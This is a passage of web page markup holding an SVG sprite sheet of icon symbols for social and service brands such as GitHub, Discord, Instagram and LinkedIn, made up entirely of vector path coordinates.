</symbol> <symbol id="icon-behance" viewBox="0 0 24 24"> <path d="M7.799,5.698c0.589,0,1.12,0.051,1.606,0.156c0.482,0.102,0.894,0.273,1.241,0.507c0.344,0.235,0.612,0.546,0.804,0.938 c0.188,0.387,0.281,0.871,0.281,1.443c0,0.619-0.141,1.137-0.421,1.551c-0.284,0.413-0.7,0.751-1.255,1.014 c0.756,0.218,1.317,0.601,1.689,1.146c0.374,0.549,0.557,1.205,0.557,1.975c0,0.623-0.12,1.161-0.359,1.612 c-0.241,0.457-0.569,0.828-0.973,1.114c-0.408,0.288-0.876,0.5-1.399,0.637C9.052,17.931,8.514,18,7.963,18H2V5.698H7.799 M7.449,10.668c0.481,0,0.878-0.114,1.192-0.345c0.311-0.228,0.463-0.603,0.463-1.119c0-0.286-0.051-0.523-0.152-0.707 C8.848,8.315,8.711,8.171,8.536,8.07C8.362,7.966,8.166,7.894,7.94,7.854c-0.224-0.044-0.457-0.06-0.697-0.06H4.709v2.874H7.449z M7.6,15.905c0.267,0,0.521-0.024,0.759-0.077c0.243-0.053,0.457-0.137,0.637-0.261c0.182-0.12,0.332-0.283,0.441-0.491 C9.547,14.87,9.6,14.602,9.6,14.278c0-0.633-0.18-1.084-0.533-1.357c-0.356-0.27-0.83-0.404-1.413-0.404H4.709v3.388L7.6,15.905z M16.162,15.864c0.367,0.358,0.897,0.538,1.583,0.538c0.493,0,0.92-0.125,1.277-0.374c0.354-0.248,0.571-0.514,0.654-0.79h2.155 c-0.347,1.072-0.872,1.838-1.589,2.299C19.534,18,18.67,18.23,17.662,18.23c-0.701,0-1.332-0.113-1.899-0.337 c-0.567-0.227-1.041-0.544-1.439-0.958c-0.389-0.415-0.689-0.907-0.904-1.484c-0.213-0.574-0.32-1.21-0.32-1.899 c0-0.666,0.11-1.288,0.329-1.863c0.222-0.577,0.529-1.075,0.933-1.492c0.406-0.42,0.885-0.751,1.444-0.994 c0.558-0.241,1.175-0.363,1.857-0.363c0.754,0,1.414,0.145,1.98,0.44c0.563,0.291,1.026,0.686,1.389,1.181 c0.363,0.493,0.622,1.057,0.783,1.69c0.16,0.632,0.217,1.292,0.171,1.983h-6.428C15.557,14.84,15.795,15.506,16.162,15.864 M18.973,11.184c-0.291-0.321-0.783-0.496-1.384-0.496c-0.39,0-0.714,0.066-0.973,0.2c-0.254,0.132-0.461,0.297-0.621,0.491 c-0.157,0.197-0.265,0.405-0.328,0.628c-0.063,0.217-0.101,0.413-0.111,0.587h3.98C19.478,11.969,19.265,11.509,18.973,11.184z M15.057,7.738h4.985V6.524h-4.985L15.057,7.738z"/> </symbol> <symbol id="icon-chain" viewBox="0 0 24 24"> <path d="M19.647,16.706a1.134,1.134,0,0,0-.343-.833l-2.549-2.549a1.134,1.134,0,0,0-.833-.343,1.168,1.168,0,0,0-.883.392l.233.226q.2.189.264.264a2.922,2.922,0,0,1,.184.233.986.986,0,0,1,.159.312,1.242,1.242,0,0,1,.043.337,1.172,1.172,0,0,1-1.176,1.176,1.237,1.237,0,0,1-.337-.043,1,1,0,0,1-.312-.159,2.76,2.76,0,0,1-.233-.184q-.073-.068-.264-.264l-.226-.233a1.19,1.19,0,0,0-.4.895,1.134,1.134,0,0,0,.343.833L15.837,19.3a1.13,1.13,0,0,0,.833.331,1.18,1.18,0,0,0,.833-.318l1.8-1.789a1.12,1.12,0,0,0,.343-.821Zm-8.615-8.64a1.134,1.134,0,0,0-.343-.833L8.163,4.7a1.134,1.134,0,0,0-.833-.343,1.184,1.184,0,0,0-.833.331L4.7,6.473a1.12,1.12,0,0,0-.343.821,1.134,1.134,0,0,0,.343.833l2.549,2.549a1.13,1.13,0,0,0,.833.331,1.184,1.184,0,0,0,.883-.38L8.728,10.4q-.2-.189-.264-.264A2.922,2.922,0,0,1,8.28,9.9a.986.986,0,0,1-.159-.312,1.242,1.242,0,0,1-.043-.337A1.172,1.172,0,0,1,9.254,8.079a1.237,1.237,0,0,1,.337.043,1,1,0,0,1,.312.159,2.761,2.761,0,0,1,.233.184q.073.068.264.264l.226.233a1.19,1.19,0,0,0,.4-.895ZM22,16.706a3.343,3.343,0,0,1-1.042,2.488l-1.8,1.789a3.536,3.536,0,0,1-4.988-.025l-2.525-2.537a3.384,3.384,0,0,1-1.017-2.488,3.448,3.448,0,0,1,1.078-2.561l-1.078-1.078a3.434,3.434,0,0,1-2.549,1.078,3.4,3.4,0,0,1-2.5-1.029L3.029,9.794A3.4,3.4,0,0,1,2,7.294,3.343,3.343,0,0,1,3.042,4.806l1.8-1.789A3.384,3.384,0,0,1,7.331,2a3.357,3.357,0,0,1,2.5,1.042l2.525,2.537a3.384,3.384,0,0,1,1.017,2.488,3.448,3.448,0,0,1-1.078,2.561l1.078,1.078a3.551,3.551,0,0,1,5.049-.049l2.549,2.549A3.4,3.4,0,0,1,22,16.706Z"/> </symbol> <symbol id="icon-codepen" viewBox="0 0 24 24"> <path d="M22.016,8.84c-0.002-0.013-0.005-0.025-0.007-0.037c-0.005-0.025-0.008-0.048-0.015-0.072 c-0.003-0.015-0.01-0.028-0.013-0.042c-0.008-0.02-0.015-0.04-0.023-0.062c-0.007-0.015-0.013-0.028-0.02-0.042 c-0.008-0.02-0.018-0.037-0.03-0.057c-0.007-0.013-0.017-0.027-0.025-0.038c-0.012-0.018-0.023-0.035-0.035-0.052 c-0.01-0.013-0.02-0.025-0.03-0.037c-0.015-0.017-0.028-0.032-0.043-0.045c-0.01-0.012-0.022-0.023-0.035-0.035 c-0.015-0.015-0.032-0.028-0.048-0.04c-0.012-0.01-0.025-0.02-0.037-0.03c-0.005-0.003-0.01-0.008-0.015-0.012l-9.161-6.096 c-0.289-0.192-0.666-0.192-0.955,0L2.359,8.237C2.354,8.24,2.349,8.245,2.344,8.249L2.306,8.277 c-0.017,0.013-0.033,0.027-0.048,0.04C2.246,8.331,2.234,8.342,2.222,8.352c-0.015,0.015-0.028,0.03-0.042,0.047 c-0.012,0.013-0.022,0.023-0.03,0.037C2.139,8.453,2.125,8.471,2.115,8.488C2.107,8.501,2.099,8.514,2.09,8.526 C2.079,8.548,2.069,8.565,2.06,8.585C2.054,8.6,2.047,8.613,2.04,8.626C2.032,8.648,2.025,8.67,2.019,8.69 c-0.005,0.013-0.01,0.027-0.013,0.042C1.999,8.755,1.995,8.778,1.99,8.803C1.989,8.817,1.985,8.828,1.984,8.84 C1.978,8.879,1.975,8.915,1.975,8.954v6.093c0,0.037,0.003,0.075,0.008,0.112c0.002,0.012,0.005,0.025,0.007,0.038 c0.005,0.023,0.008,0.047,0.015,0.072c0.003,0.015,0.008,0.028,0.013,0.04c0.007,0.022,0.013,0.042,0.022,0.063 c0.007,0.015,0.013,0.028,0.02,0.04c0.008,0.02,0.018,0.038,0.03,0.058c0.007,0.013,0.015,0.027,0.025,0.038 c0.012,0.018,0.023,0.035,0.035,0.052c0.01,0.013,0.02,0.025,0.03,0.037c0.013,0.015,0.028,0.032,0.042,0.045 c0.012,0.012,0.023,0.023,0.035,0.035c0.015,0.013,0.032,0.028,0.048,0.04l0.038,0.03c0.005,0.003,0.01,0.007,0.013,0.01 l9.163,6.095C11.668,21.953,11.833,22,12,22c0.167,0,0.332-0.047,0.478-0.144l9.163-6.095l0.015-0.01 c0.013-0.01,0.027-0.02,0.037-0.03c0.018-0.013,0.035-0.028,0.048-0.04c0.013-0.012,0.025-0.023,0.035-0.035 c0.017-0.015,0.03-0.032,0.043-0.045c0.01-0.013,0.02-0.025,0.03-0.037c0.013-0.018,0.025-0.035,0.035-0.052 c0.008-0.013,0.018-0.027,0.025-0.038c0.012-0.02,0.022-0.038,0.03-0.058c0.007-0.013,0.013-0.027,0.02-0.04 c0.008-0.022,0.015-0.042,0.023-0.063c0.003-0.013,0.01-0.027,0.013-0.04c0.007-0.025,0.01-0.048,0.015-0.072 c0.002-0.013,0.005-0.027,0.007-0.037c0.003-0.042,0.007-0.079,0.007-0.117V8.954C22.025,8.915,22.022,8.879,22.016,8.84z M12.862,4.464l6.751,4.49l-3.016,2.013l-3.735-2.492V4.464z M11.138,4.464v4.009l-3.735,2.494L4.389,8.954L11.138,4.464z M3.699,10.562L5.853,12l-2.155,1.438V10.562z M11.138,19.536l-6.749-4.491l3.015-2.011l3.735,2.492V19.536z M12,14.035L8.953,12 L12,9.966L15.047,12L12,14.035z M12.862,19.536v-4.009l3.735-2.492l3.016,2.011L12.862,19.536z M20.303,13.438L18.147,12 l2.156-1.438L20.303,13.438z"/> </symbol> <symbol id="icon-deviantart" viewBox="0 0 24 24"> <path d="M 18.19 5.636 18.19 2 18.188 2 14.553 2 14.19 2.366 12.474 5.636 11.935 6 5.81 6 5.81 10.994 9.177 10.994 9.477 11.357 5.81 18.363 5.81 22 5.811 22 9.447 22 9.81 21.634 11.526 18.364 12.065 18 18.19 18 18.19 13.006 14.823 13.006 14.523 12.641 18.19 5.636z"/> </symbol> <symbol id="icon-digg" viewBox="0 0 24 24"> <path d="M4.5,5.4h2.2V16H1V8.5h3.5V5.4L4.5,5.4z M4.5,14.2v-4H3.2v4H4.5z M7.6,8.5V16h2.2V8.5C9.8,8.5,7.6,8.5,7.6,8.5z M7.6,5.4 v2.2h2.2V5.4C9.8,5.4,7.6,5.4,7.6,5.4z M10.7,8.5h5.7v10.1h-5.7v-1.8h3.5V16h-3.5C10.7,16,10.7,8.5,10.7,8.5z M14.2,14.2v-4h-1.3v4 H14.2z M17.3,8.5H23v10.1h-5.7v-1.8h3.5V16h-3.5C17.3,16,17.3,8.5,17.3,8.5z M20.8,14.2v-4h-1.3v4H20.8z"/> </symbol> <symbol id="icon-discord" viewBox="0 0 24 24"> <path d="M10.227 9.957c-.559 0-1 .48-1 1.063 0 .585.453 1.066 1 1.066.558 0 1-.48 1-1.066.007-.582-.442-1.063-1-1.063zm3.574 0c-.559 0-.996.48-.996 1.063 0 .585.449 1.066.996 1.066.558 0 1-.48 1-1.066 0-.582-.442-1.063-1-1.063zm0 0 M18.563 1.918H5.438c-1.11 0-2.008.879-2.008 1.973v12.957c0 1.093.898 1.972 2.007 1.972h11.11l-.52-1.773 1.254 1.14 1.184 1.075 2.105 1.82V3.891c0-1.094-.898-1.973-2.008-1.973zM14.78 14.434s-.351-.414-.644-.778c1.281-.355 1.773-1.14 1.773-1.14a5.745 5.745 0 0 1-1.129.566c-.488.2-.96.336-1.418.41a7.07 7.07 0 0 1-2.539-.008 8.133 8.133 0 0 1-1.441-.414 6.219 6.219 0 0 1-.715-.324c-.027-.02-.059-.027-.086-.047a.113.113 0 0 1-.039-.031c-.176-.094-.273-.16-.273-.16s.468.765 1.71 1.129c-.293.363-.656.797-.656.797-2.164-.067-2.984-1.457-2.984-1.457 0-3.086 1.41-5.586 1.41-5.586 1.41-1.036 2.75-1.008 2.75-1.008l.098.113c-1.762.5-2.575 1.258-2.575 1.258s.215-.117.579-.277c1.046-.454 1.878-.579 2.222-.606.059-.008.11-.02.168-.02a8.728 8.728 0 0 1 1.977-.019c.933.106 1.93.375 2.949.922 0 0-.773-.719-2.438-1.219l.137-.152s1.34-.028 2.75 1.008c0 0 1.414 2.5 1.414 5.586 0 0-.836 1.39-3 1.457zm0 0"/> </symbol> <symbol id="icon-dribbble" viewBox="0 0 24 24"> <path d="M12,22C6.486,22,2,17.514,2,12S6.486,2,12,2c5.514,0,10,4.486,10,10S17.514,22,12,22z M20.434,13.369 c-0.292-0.092-2.644-0.794-5.32-0.365c1.117,3.07,1.572,5.57,1.659,6.09C18.689,17.798,20.053,15.745,20.434,13.369z M15.336,19.876c-0.127-0.749-0.623-3.361-1.822-6.477c-0.019,0.006-0.038,0.013-0.056,0.019c-4.818,1.679-6.547,5.02-6.701,5.334 c1.448,1.129,3.268,1.803,5.243,1.803C13.183,20.555,14.311,20.313,15.336,19.876z M5.654,17.724 c0.193-0.331,2.538-4.213,6.943-5.637c0.111-0.036,0.224-0.07,0.337-0.102c-0.214-0.485-0.448-0.971-0.692-1.45 c-4.266,1.277-8.405,1.223-8.778,1.216c-0.003,0.087-0.004,0.174-0.004,0.261C3.458,14.207,4.29,16.21,5.654,17.724z M3.639,10.264 c0.382,0.005,3.901,0.02,7.897-1.041c-1.415-2.516-2.942-4.631-3.167-4.94C5.979,5.41,4.193,7.613,3.639,10.264z M9.998,3.709 c0.236,0.316,1.787,2.429,3.187,5c3.037-1.138,4.323-2.867,4.477-3.085C16.154,4.286,14.17,3.471,12,3.471 C11.311,3.471,10.641,3.554,9.998,3.709z M18.612,6.612C18.432,6.855,17,8.69,13.842,9.979c0.199,0.407,0.389,0.821,0.567,1.237 c0.063,0.148,0.124,0.295,0.184,0.441c2.842-0.357,5.666,0.215,5.948,0.275C20.522,9.916,19.801,8.065,18.612,6.612z"/> </symbol> <symbol id="icon-dropbox" viewBox="0 0 24 24"> <path d="M12,6.134L6.069,9.797L2,6.54l5.883-3.843L12,6.134z M2,13.054l5.883,3.843L12,13.459L6.069,9.797L2,13.054z M12,13.459 l4.116,3.439L22,13.054l-4.069-3.257L12,13.459z M22,6.54l-5.884-3.843L12,6.134l5.931,3.663L22,6.54z M12.011,14.2l-4.129,3.426 l-1.767-1.153v1.291l5.896,3.539l5.897-3.539v-1.291l-1.769,1.153L12.011,14.2z"/> </symbol> <symbol id="icon-etsy" viewBox="0 0 24 24"> <path d="M9.16033,4.038c0-.27174.02717-.43478.48913-.43478h6.22283c1.087,0,1.68478.92391,2.11957,2.663l.35326,1.38587h1.05978C19.59511,3.712,19.75815,2,19.75815,2s-2.663.29891-4.23913.29891h-7.962L3.29076,2.163v1.1413L4.731,3.57609c1.00543.19022,1.25.40761,1.33152,1.33152,0,0,.08152,2.71739.08152,7.20109s-.08152,7.17391-.08152,7.17391c0,.81522-.32609,1.11413-1.33152,1.30435l-1.44022.27174V22l4.2663-.13587h7.11957c1.60326,0,5.32609.13587,5.32609.13587.08152-.97826.625-5.40761.70652-5.89674H19.7038L18.644,18.52174c-.84239,1.90217-2.06522,2.038-3.42391,2.038H11.1712c-1.3587,0-2.01087-.54348-2.01087-1.712V12.65217s3.0163,0,3.99457.08152c.76087.05435,1.22283.27174,1.46739,1.33152l.32609,1.413h1.16848l-.08152-3.55978.163-3.587H15.02989l-.38043,1.57609c-.24457,1.03261-.40761,1.22283-1.46739,1.33152-1.38587.13587-4.02174.1087-4.02174.1087Z"/> </symbol> <symbol id="icon-facebook" viewBox="0 0 24 24"> <path d="M20.007,3H3.993C3.445,3,3,3.445,3,3.993v16.013C3,20.555,3.445,21,3.993,21h8.621v-6.971h-2.346v-2.717h2.346V9.31 c0-2.325,1.42-3.591,3.494-3.591c0.993,0,1.847,0.074,2.096,0.107v2.43l-1.438,0.001c-1.128,0-1.346,0.536-1.346,1.323v1.734h2.69 l-0.35,2.717h-2.34V21h4.587C20.555,21,21,20.555,21,20.007V3.993C21,3.445,20.555,3,20.007,3z"/> </symbol> <symbol id="icon-feed" viewBox="0 0 24 24"> <path d="M2,8.667V12c5.515,0,10,4.485,10,10h3.333C15.333,14.637,9.363,8.667,2,8.667z M2,2v3.333 c9.19,0,16.667,7.477,16.667,16.667H22C22,10.955,13.045,2,2,2z M4.5,17C3.118,17,2,18.12,2,19.5S3.118,22,4.5,22S7,20.88,7,19.5 S5.882,17,4.5,17z"/> </symbol> <symbol id="icon-flickr" viewBox="0 0 24 24"> <path d="M6.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5S9.25,7,6.5,7z M17.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5 S20.25,7,17.5,7z"/> </symbol> <symbol id="icon-foursquare" viewBox="0 0 24 24"> <path d="M17.573,2c0,0-9.197,0-10.668,0S5,3.107,5,3.805s0,16.948,0,16.948c0,0.785,0.422,1.077,0.66,1.172 c0.238,0.097,0.892,0.177,1.285-0.275c0,0,5.035-5.843,5.122-5.93c0.132-0.132,0.132-0.132,0.262-0.132h3.26 c1.368,0,1.588-0.977,1.732-1.552c0.078-0.318,0.692-3.428,1.225-6.122l0.675-3.368C19.56,2.893,19.14,2,17.573,2z M16.495,7.22 c-0.053,0.252-0.372,0.518-0.665,0.518c-0.293,0-4.157,0-4.157,0c-0.467,0-0.802,0.318-0.802,0.787v0.508 c0,0.467,0.337,0.798,0.805,0.798c0,0,3.197,0,3.528,0s0.655,0.362,0.583,0.715c-0.072,0.353-0.407,2.102-0.448,2.295 c-0.04,0.193-0.262,0.523-0.655,0.523c-0.33,0-2.88,0-2.88,0c-0.523,0-0.683,0.068-1.033,0.503 c-0.35,0.437-3.505,4.223-3.505,4.223c-0.032,0.035-0.063,0.027-0.063-0.015V4.852c0-0.298,0.26-0.648,0.648-0.648 c0,0,8.228,0,8.562,0c0.315,0,0.61,0.297,0.528,0.683L16.495,7.22z"/> </symbol> <symbol id="icon-goodreads" viewBox="0 0 24 24"> <path d="M17.3,17.5c-0.2,0.8-0.5,1.4-1,1.9c-0.4,0.5-1,0.9-1.7,1.2C13.9,20.9,13.1,21,12,21c-0.6,0-1.3-0.1-1.9-0.2 c-0.6-0.1-1.1-0.4-1.6-0.7c-0.5-0.3-0.9-0.7-1.2-1.2c-0.3-0.5-0.5-1.1-0.5-1.7h1.5c0.1,0.5,0.2,0.9,0.5,1.2 c0.2,0.3,0.5,0.6,0.9,0.8c0.3,0.2,0.7,0.3,1.1,0.4c0.4,0.1,0.8,0.1,1.2,0.1c1.4,0,2.5-0.4,3.1-1.2c0.6-0.8,1-2,1-3.5v-1.7h0 c-0.4,0.8-0.9,1.4-1.6,1.9c-0.7,0.5-1.5,0.7-2.4,0.7c-1,0-1.9-0.2-2.6-0.5C8.7,15,8.1,14.5,7.7,14c-0.5-0.6-0.8-1.3-1-2.1 c-0.2-0.8-0.3-1.6-0.3-2.5c0-0.9,0.1-1.7,0.4-2.5c0.3-0.8,0.6-1.5,1.1-2c0.5-0.6,1.1-1,1.8-1.4C10.3,3.2,11.1,3,12,3 c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.8,0.3,1.1,0.5c0.3,0.2,0.6,0.5,0.9,0.8c0.3,0.3,0.5,0.6,0.6,1h0V3.4h1.5V15 C17.6,15.9,17.5,16.7,17.3,17.5z M13.8,14.1c0.5-0.3,0.9-0.7,1.3-1.1c0.3-0.5,0.6-1,0.8-1.6c0.2-0.6,0.3-1.2,0.3-1.9 c0-0.6-0.1-1.2-0.2-1.9c-0.1-0.6-0.4-1.2-0.7-1.7c-0.3-0.5-0.7-0.9-1.3-1.2c-0.5-0.3-1.1-0.5-1.9-0.5s-1.4,0.2-1.9,0.5 c-0.5,0.3-1,0.7-1.3,1.2C8.5,6.4,8.3,7,8.1,7.6C8,8.2,7.9,8.9,7.9,9.5c0,0.6,0.1,1.3,0.2,1.9C8.3,12,8.6,12.5,8.9,13 c0.3,0.5,0.8,0.8,1.3,1.1c0.5,0.3,1.1,0.4,1.9,0.4C12.7,14.5,13.3,14.4,13.8,14.1z"/> </symbol> <symbol id="icon-google" viewBox="0 0 24 24"> <path d="M12.02,10.18v3.72v0.01h5.51c-0.26,1.57-1.67,4.22-5.5,4.22c-3.31,0-6.01-2.75-6.01-6.12s2.7-6.12,6.01-6.12 c1.87,0,3.13,0.8,3.85,1.48l2.84-2.76C16.99,2.99,14.73,2,12.03,2c-5.52,0-10,4.48-10,10s4.48,10,10,10c5.77,0,9.6-4.06,9.6-9.77 c0-0.83-0.11-1.42-0.25-2.05H12.02z"/> </symbol> <symbol id="icon-github" viewBox="0 0 24 24"> <path d="M12,2C6.477,2,2,6.477,2,12c0,4.419,2.865,8.166,6.839,9.489c0.5,0.09,0.682-0.218,0.682-0.484 c0-0.236-0.009-0.866-0.014-1.699c-2.782,0.602-3.369-1.34-3.369-1.34c-0.455-1.157-1.11-1.465-1.11-1.465 c-0.909-0.62,0.069-0.608,0.069-0.608c1.004,0.071,1.532,1.03,1.532,1.03c0.891,1.529,2.341,1.089,2.91,0.833 c0.091-0.647,0.349-1.086,0.635-1.337c-2.22-0.251-4.555-1.111-4.555-4.943c0-1.091,0.39-1.984,1.03-2.682 C6.546,8.54,6.202,7.524,6.746,6.148c0,0,0.84-0.269,2.75,1.025C10.295,6.95,11.15,6.84,12,6.836 c0.85,0.004,1.705,0.114,2.504,0.336c1.909-1.294,2.748-1.025,2.748-1.025c0.546,1.376,0.202,2.394,0.1,2.646 c0.64,0.699,1.026,1.591,1.026,2.682c0,3.841-2.337,4.687-4.565,4.935c0.359,0.307,0.679,0.917,0.679,1.852 c0,1.335-0.012,2.415-0.012,2.741c0,0.269,0.18,0.579,0.688,0.481C19.138,20.161,22,16.416,22,12C22,6.477,17.523,2,12,2z"/> </symbol> <symbol id="icon-instagram" viewBox="0 0 24 24"> <path d="M12,4.622c2.403,0,2.688,0.009,3.637,0.052c0.877,0.04,1.354,0.187,1.671,0.31c0.42,0.163,0.72,0.358,1.035,0.673 c0.315,0.315,0.51,0.615,0.673,1.035c0.123,0.317,0.27,0.794,0.31,1.671c0.043,0.949,0.052,1.234,0.052,3.637 s-0.009,2.688-0.052,3.637c-0.04,0.877-0.187,1.354-0.31,1.671c-0.163,0.42-0.358,0.72-0.673,1.035 c-0.315,0.315-0.615,0.51-1.035,0.673c-0.317,0.123-0.794,0.27-1.671,0.31c-0.949,0.043-1.233,0.052-3.637,0.052 s-2.688-0.009-3.637-0.052c-0.877-0.04-1.354-0.187-1.671-0.31c-0.42-0.163-0.72-0.358-1.035-0.673 c-0.315-0.315-0.51-0.615-0.673-1.035c-0.123-0.317-0.27-0.794-0.31-1.671C4.631,14.688,4.622,14.403,4.622,12 s0.009-2.688,0.052-3.637c0.04-0.877,0.187-1.354,0.31-1.671c0.163-0.42,0.358-0.72,0.673-1.035 c0.315-0.315,0.615-0.51,1.035-0.673c0.317-0.123,0.794-0.27,1.671-0.31C9.312,4.631,9.597,4.622,12,4.622 M12,3 C9.556,3,9.249,3.01,8.289,3.054C7.331,3.098,6.677,3.25,6.105,3.472C5.513,3.702,5.011,4.01,4.511,4.511 c-0.5,0.5-0.808,1.002-1.038,1.594C3.25,6.677,3.098,7.331,3.054,8.289C3.01,9.249,3,9.556,3,12c0,2.444,0.01,2.751,0.054,3.711 c0.044,0.958,0.196,1.612,0.418,2.185c0.23,0.592,0.538,1.094,1.038,1.594c0.5,0.5,1.002,0.808,1.594,1.038 c0.572,0.222,1.227,0.375,2.185,0.418C9.249,20.99,9.556,21,12,21s2.751-0.01,3.711-0.054c0.958-0.044,1.612-0.196,2.185-0.418 c0.592-0.23,1.094-0.538,1.594-1.038c0.5-0.5,0.808-1.002,1.038-1.594c0.222-0.572,0.375-1.227,0.418-2.185 C20.99,14.751,21,14.444,21,12s-0.01-2.751-0.054-3.711c-0.044-0.958-0.196-1.612-0.418-2.185c-0.23-0.592-0.538-1.094-1.038-1.594 c-0.5-0.5-1.002-0.808-1.594-1.038c-0.572-0.222-1.227-0.375-2.185-0.418C14.751,3.01,14.444,3,12,3L12,3z M12,7.378 c-2.552,0-4.622,2.069-4.622,4.622S9.448,16.622,12,16.622s4.622-2.069,4.622-4.622S14.552,7.378,12,7.378z M12,15 c-1.657,0-3-1.343-3-3s1.343-3,3-3s3,1.343,3,3S13.657,15,12,15z M16.804,6.116c-0.596,0-1.08,0.484-1.08,1.08 s0.484,1.08,1.08,1.08c0.596,0,1.08-0.484,1.08-1.08S17.401,6.116,16.804,6.116z"/> </symbol> <symbol id="icon-linkedin" viewBox="0 0 24 24"> <path d="M19.7,3H4.3C3.582,3,3,3.582,3,4.3v15.4C3,20.418,3.582,21,4.3,21h15.4c0.718,0,1.3-0.582,1.3-1.3V4.3 C21,3.582,20.418,3,19.7,3z M8.339,18.338H5.667v-8.59h2.672V18.338z M7.004,8.574c-0.857,0-1.549-0.694-1.549-1.548 c0-0.855,0.691-1.548,1.549-1.548c0.854,0,1.547,0.694,1.547,1.548C8.551,7.881,7.858,8.574,7.004,8.574z M18.339,18.338h-2.669 v-4.177c0-0.996-0.017-2.278-1.387-2.278c-1.389,0-1.601,1.086-1.601,2.206v4.249h-2.667v-8.59h2.559v1.174h0.037 c0.356-0.675,1.227-1.387,2.526-1.387c2.703,0,3.203,1.779,3.203,4.092V18.338z"/> </symbol> <symbol id="icon-mail" viewBox="0 0 24 24"> <path d="M20,4H4C2.895,4,2,4.895,2,6v12c0,1.105,0.895,2,2,2h16c1.105,0,2-0.895,2-2V6C22,4.895,21.105,4,20,4z M20,8.236l-8,4.882 L4,8.236V6h16V8.236z"/> </symbol> <symbol id="icon-meetup" viewBox="0 0 24 24"> <path d="M19.24775,14.722a3.57032,3.57032,0,0,1-2.94457,3.52073,3.61886,3.61886,0,0,1-.64652.05634c-.07314-.0008-.10187.02846-.12507.09547A2.38881,2.38881,0,0,1,13.49453,20.094a2.33092,2.33092,0,0,1-1.827-.50716.13635.13635,0,0,0-.19878-.00408,3.191,3.191,0,0,1-2.104.60248,3.26309,3.26309,0,0,1-3.00324-2.71993,2.19076,2.19076,0,0,1-.03512-.30865c-.00156-.08579-.03413-.1189-.11608-.13493a2.86421,2.86421,0,0,1-1.23189-.56111,2.945,2.945,0,0,1-1.166-2.05749,2.97484,2.97484,0,0,1,.87524-2.50774.112.112,0,0,0,.02091-.16107,2.7213,2.7213,0,0,1-.36648-1.48A2.81256,2.81256,0,0,1,6.57673,7.58838a.35764.35764,0,0,0,.28869-.22819,4.2208,4.2208,0,0,1,6.02892-1.90111.25161.25161,0,0,0,.22023.0243,3.65608,3.65608,0,0,1,3.76031.90678A3.57244,3.57244,0,0,1,17.95918,8.626a2.97339,2.97339,0,0,1,.01829.57356.10637.10637,0,0,0,.0853.12792,1.97669,1.97669,0,0,1,1.27939,1.33733,2.00266,2.00266,0,0,1-.57112,2.12652c-.05284.05166-.04168.08328-.01173.13489A3.51189,3.51189,0,0,1,19.24775,14.722Zm-6.35959-.27836a1.6984,1.6984,0,0,0,1.14556,1.61113,3.82039,3.82039,0,0,0,1.036.17935,1.46888,1.46888,0,0,0,.73509-.12255.44082.44082,0,0,0,.26057-.44274.45312.45312,0,0,0-.29211-.43375.97191.97191,0,0,0-.20678-.063c-.21326-.03806-.42754-.0701-.63973-.11215a.54787.54787,0,0,1-.50172-.60926,2.75864,2.75864,0,0,1,.1773-.901c.1763-.535.414-1.045.64183-1.55913A12.686,12.686,0,0,0,15.85,10.47863a1.58461,1.58461,0,0,0,.04861-.87208,1.04531,1.04531,0,0,0-.85432-.83981,1.60658,1.60658,0,0,0-1.23654.16594.27593.27593,0,0,1-.36286-.03413c-.085-.0747-.16594-.15379-.24918-.23055a.98682.98682,0,0,0-1.33577-.04933,6.1468,6.1468,0,0,1-.4989.41615.47762.47762,0,0,1-.51535.03566c-.17448-.09307-.35512-.175-.53531-.25665a1.74949,1.74949,0,0,0-.56476-.2016,1.69943,1.69943,0,0,0-1.61654.91787,8.05815,8.05815,0,0,0-.32952.80126c-.45471,1.2557-.82507,2.53825-1.20838,3.81639a1.24151,1.24151,0,0,0,.51532,1.44389,1.42659,1.42659,0,0,0,1.22008.17166,1.09728,1.09728,0,0,0,.66994-.69764c.44145-1.04111.839-2.09989,1.25981-3.14926.11581-.28876.22792-.57874.35078-.86438a.44548.44548,0,0,1,.69189-.19539.50521.50521,0,0,1,.15044.43836,1.75625,1.75625,0,0,1-.14731.50453c-.27379.69219-.55265,1.38236-.82766,2.074a2.0836,2.0836,0,0,0-.14038.42876.50719.50719,0,0,0,.27082.57722.87236.87236,0,0,0,.66145.02739.99137.99137,0,0,0,.53406-.532q.61571-1.20914,1.228-2.42031.28423-.55863.57585-1.1133a.87189.87189,0,0,1,.29055-.35253.34987.34987,0,0,1,.37634-.01265.30291.30291,0,0,1,.12434.31459.56716.56716,0,0,1-.04655.1915c-.05318.12739-.10286.25669-.16183.38156-.34118.71775-.68754,1.43273-1.02568,2.152A2.00213,2.00213,0,0,0,12.88816,14.44366Zm4.78568,5.28972a.88573.88573,0,0,0-1.77139.00465.8857.8857,0,0,0,1.77139-.00465Zm-14.83838-7.296a.84329.84329,0,1,0,.00827-1.68655.8433.8433,0,0,0-.00827,1.68655Zm10.366-9.43673a.83506.83506,0,1,0-.0091,1.67.83505.83505,0,0,0,.0091-1.67Zm6.85014,5.22a.71651.71651,0,0,0-1.433.0093.71656.71656,0,0,0,1.433-.0093ZM5.37528,6.17908A.63823.63823,0,1,0,6.015,5.54483.62292.62292,0,0,0,5.37528,6.17908Zm6.68214,14.80843a.54949.54949,0,1,0-.55052.541A.54556.54556,0,0,0,12.05742,20.98752Zm8.53235-8.49689a.54777.54777,0,0,0-.54027.54023.53327.53327,0,0,0,.532.52293.51548.51548,0,0,0,.53272-.5237A.53187.53187,0,0,0,20.58977,12.49063ZM7.82846,2.4715a.44927.44927,0,1,0,.44484.44766A.43821.43821,0,0,0,7.82846,2.4715Zm13.775,7.60492a.41186.41186,0,0,0-.40065.39623.40178.40178,0,0,0,.40168.40168A.38994.38994,0,0,0,22,10.48172.39946.39946,0,0,0,21.60349,10.07642ZM5.79193,17.96207a.40469.40469,0,0,0-.397-.39646.399.399,0,0,0-.396.405.39234.39234,0,0,0,.39939.389A.39857.39857,0,0,0,5.79193,17.96207Z"/> </symbol> <symbol id="icon-medium" viewBox="0 0 24 24"> <path d="M20.962,7.257l-5.457,8.867l-3.923-6.375l3.126-5.08c0.112-0.182,0.319-0.286,0.527-0.286c0.05,0,0.1,0.008,0.149,0.02 c0.039,0.01,0.078,0.023,0.114,0.041l5.43,2.715l0.006,0.003c0.004,0.002,0.007,0.006,0.011,0.008 C20.971,7.191,20.98,7.227,20.962,7.257z M9.86,8.592v5.783l5.14,2.57L9.86,8.592z M15.772,17.331l4.231,2.115 C20.554,19.721,21,19.529,21,19.016V8.835L15.772,17.331z 